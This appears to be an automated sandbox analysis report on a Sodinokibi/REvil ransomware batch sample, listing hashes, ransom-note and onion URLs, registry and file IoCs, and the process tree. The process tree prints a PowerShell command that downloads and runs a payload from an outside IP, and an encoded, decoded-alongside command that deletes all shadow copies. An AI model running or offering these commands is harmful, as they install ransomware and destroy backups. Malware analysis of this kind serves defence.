Analysis
- max time kernel: 38s
- max time network: 59s
- platform: windows7_x64
- resource: win7v200430
- submitted: 04-06-2020 22:10
Static task: static1

Behavioral task: behavioral1
- Sample: bef69b68e4cea8e3eefee8da26543509.bat
- Resource: win7v200430

Behavioral task: behavioral2
- Sample: bef69b68e4cea8e3eefee8da26543509.bat
- Resource: win10v200430
General
- Target: bef69b68e4cea8e3eefee8da26543509.bat
- Size: 220B
- MD5: f506edf0fe02fe851c4ad75db6112399
- SHA1: 583ba0b7f8553e3ea3adf90de4f1750e8d989390
- SHA256: f6d98f99d70c4be05421f3c7fddc98c074854a0e6a38659100f275804a5c187e
- SHA512: db82f1056a21ebf451fb3bc400daf9efd94c43110f256c74653bc68f7c113a4d93e1c633c084a687cb42d391875c026fa643c221ccb1126ead3bf2d7cfaa3619
Malware Config
- Extracted: http://185.103.242.78/pastes/bef69b68e4cea8e3eefee8da26543509
- Extracted: C:\z51x2b3522-readme.txt
  sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3187F5FE3E32B1A5
  http://decryptor.cc/3187F5FE3E32B1A5
Signatures
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.

- Enumerates connected drives (3 TTPs)

- Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe

- Drops file in Program Files directory (17 IoCs)
  Processes: powershell.exe
  description | ioc | process
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\z51x2b3522-readme.txt | powershell.exe
  File created | \??\c:\program files\z51x2b3522-readme.txt | powershell.exe
  File created | \??\c:\program files (x86)\z51x2b3522-readme.txt | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\z51x2b3522-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\UninstallPop.vsdm | powershell.exe
  File opened for modification | \??\c:\program files\MeasureCompare.rtf | powershell.exe
  File opened for modification | \??\c:\program files\PingSuspend.docx | powershell.exe
  File opened for modification | \??\c:\program files\UninstallUnblock.wmv | powershell.exe
  File opened for modification | \??\c:\program files\FindUninstall.midi | powershell.exe
  File opened for modification | \??\c:\program files\SendSubmit.tif | powershell.exe
  File opened for modification | \??\c:\program files\StartEdit.php | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\z51x2b3522-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\RedoRegister.mpeg | powershell.exe
  File opened for modification | \??\c:\program files\BackupDisconnect.wmx | powershell.exe
  File opened for modification | \??\c:\program files\ConvertStep.wpl | powershell.exe
  File opened for modification | \??\c:\program files\CopyMove.dib | powershell.exe
  File opened for modification | \??\c:\program files\ExportConfirm.vst | powershell.exe

- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes: powershell.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\t7npx3p.bmp" | powershell.exe

- Suspicious behavior: EnumeratesProcesses (77 IoCs)
  Processes: powershell.exe, powershell.exe
  pid | process
  1396 | powershell.exe (repeated entries)
  1536 | powershell.exe (repeated entries)

- Blacklisted process makes network request (1 IoCs)
  Processes: powershell.exe
  flow | pid | process
  3 | 1396 | powershell.exe

- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  Processes: powershell.exe
  pid | process
  1396 | powershell.exe

- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: cmd.exe, powershell.exe
  description | pid | process | target process
  PID 1304 wrote to memory of 1396 | 1304 | cmd.exe | powershell.exe
  PID 1396 wrote to memory of 1536 | 1396 | powershell.exe | powershell.exe
  PID 1396 wrote to memory of 1536 | 1396 | powershell.exe | powershell.exe
  PID 1396 wrote to memory of 1536 | 1396 | powershell.exe | powershell.exe
  PID 1396 wrote to memory of 1536 | 1396 | powershell.exe | powershell.exe

- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  description | pid | process
  Token: SeDebugPrivilege | 1396 | powershell.exe
  Token: SeDebugPrivilege | 1396 | powershell.exe
  Token: SeDebugPrivilege | 1536 | powershell.exe
  Token: SeBackupPrivilege | 656 | vssvc.exe
  Token: SeRestorePrivilege | 656 | vssvc.exe
  Token: SeAuditPrivilege | 656 | vssvc.exe
  Token: SeTakeOwnershipPrivilege | 1396 | powershell.exe
Processes
- C:\Windows\system32\cmd.exe (PID 1304, depth 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\bef69b68e4cea8e3eefee8da26543509.bat"
  Signatures:
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1396, depth 2)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/bef69b68e4cea8e3eefee8da26543509');Invoke-YKHKXOBCRZILZ;Start-Sleep -s 10000"
    Signatures:
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1536, depth 3)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is UTF-16LE base64 and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

- C:\Windows\system32\vssvc.exe (PID 656, depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken